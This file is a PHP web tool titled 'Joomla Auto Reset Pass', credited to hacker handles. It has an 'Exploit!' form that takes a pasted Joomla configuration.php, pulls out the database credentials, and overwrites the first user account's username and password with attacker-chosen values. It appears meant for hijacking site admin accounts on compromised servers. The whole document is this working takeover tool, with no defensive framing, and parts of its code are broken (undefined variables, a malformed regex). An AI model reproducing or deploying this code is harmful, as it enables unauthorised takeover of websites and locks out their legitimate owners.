joomla auto reset password

1. <title>Joomla Auto Reset Pass</title>
2.     </head>
3. <body>
4.             <font size=4>Joomla Auto Reset Pass</font>
5.                         <table>
6.                             <tr><td><form method="post"></td></tr>
7.                             <tr><td align="right" style="width:5%;"><textarea placeholder="Content of configuration.php" style="padding: 5px; resize: none; width: 500px; height: 250px; border: solid 1px #006400;" name="link"></textarea><td><tr>
8.                             <tr><td><input style="width:100%; height:30px;" type="submit" value="Exploit!"></td></tr>
9.                             </form>
10.                         </table>
11.                        
12.            
13.  
14.     </body>
15. </html>
16. <?php
17. // Original Code by TU5B0L3D
18. // Recoded by ./Bl4ckcod37
19. error_reporting(0);
20.     if($_POST){
21.  
22.         function jipukteks($param, $kata1, $kata2){
23.     if(strpos($param, $kata1) === FALSE) return FALSE;
24.     if(strpos($param, $kata2) === FALSE) return FALSE;
25.     $start = strpos($param, $kata1) + strlen($kata1);
26.     $end = strpos($param, $kata2, $start);
27.     $return = substr($param, $start, $end - $start);
28.     return $return;
29. }
30.  
31.     function anucurl($sites){
32.         $ch1 = curl_init ("$sites");
33. curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
34. curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
35. curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
36. curl_setopt ($ch1, CURLOPT_CONNECTTIMEOUT, 5);
37. curl_setopt ($ch1, CURLOPT_SSL_VERIFYPEER, 0);
38. curl_setopt ($ch1, CURLOPT_SSL_VERIFYHOST, 0);
39. curl_setopt($ch1, CURLOPT_COOKIEJAR,'coker_log');
40. curl_setopt($ch1, CURLOPT_COOKIEFILE,'coker_log');
41. $data = curl_exec ($ch1);
42. return $data;
43.     }
44.  
45. function lohgin($fak1,$fak2,$fak3,$fak4,$fak5){
46.     $post2 = array(
47.                     "username" => "$fak1",
48.                     "passwd" => "$fak2",
49.                     "lang" => "en-GB",
50.                     "option" => "com_login",
51.                     "task" => "login",
52.                     "return" => "$fak3",
53.                     "$fak4" => "1",
54.                    
55.                     );
56. $ch = curl_init ("$cek");
57. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
58. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
59. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
60. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
61. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
62. curl_setopt ($ch, CURLOPT_POST, 1);
63. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
64. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
65. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
66. $data6 = curl_exec ($ch);
67. return $data6;
68.     }
69.  
70.         $link = $_POST['link'];
71.         if($link==""){
72.             echo "Report: <br>";
73.             echo "-> Config Joomla-nya Belum Diisi  ndan <-";
74.         }
75.         else{
76.             $host = "localhost";
77.                     $username = jipukteks($link,"user = '","'");
78.                     $password = jipukteks($link,"password = '","'");
79.                     $db = jipukteks($link,"db = '","'");
80.                     $dbprefix = jipukteks($link,"dbprefix = '","'");
81.                     $user_baru = "xxx";
82.                     $password_baru = "xxx";
83.                     $prefix = $dbprefix."users";
84.                     $pass = md5("$password_baru");
85.                     $serah = $db.".".$dbprefix;
86.                    
87.  
88.                     echo "<font color='#C6C646'>Database Content :</font><br>";
89.                     echo "Db Host&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp: <font color='green'>$host</font><br>";
90.                     echo "Db user&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp: <font color='green'>$username</font><br>";
91.                     echo "Db Password &nbsp: <font color='green'>$password</font><br>";
92.                     echo "Db name&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp: <font color='green'>$db</font><br>";
93.                     echo "Table_Prefix &nbsp&nbsp: <font color='green'>$dbprefix</font><br>";        
94.  
95.         mysql_connect($host,$username,$password) or die("<font color='red'>Gagal masuk Database ..</font>");
96.         mysql_select_db($db) or die("<font color='red'>Gagal masuk Database ..</font>");
97.  
98.         $show=mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
99.     $r=mysql_fetch_array($show);
100.         $id = $r[id];
101.        
102.          mysql_query("UPDATE $prefix SET password='$pass',username='$user_baru' WHERE id='$id'");
103. $utama = "$link";
104. $kedua = @file_get_contents($utama);
105. if(preg_match("askdasldasdlja12123",$kedua)){
106.                         echo "# <font color='green'>berhasil rubah password</font><br>";
107.                         echo "# $utama<br>";
108.                        
109.                     }
110.                     else{
111.                         echo "<br># <font color='green'>Pasword berhasil dirubah: </font><br>";
112.                         echo "Username: <font color='#C6C646'>$user_baru</font><br>";
113.                         echo "Password: <font color='#C6C646'>$password_baru</font><br>";
114.  
115.                        
116.                     }
117.                 }
118.  
119.  
120.  
121.  
122.     }else{
123.             echo '';
124.         }
125. ?>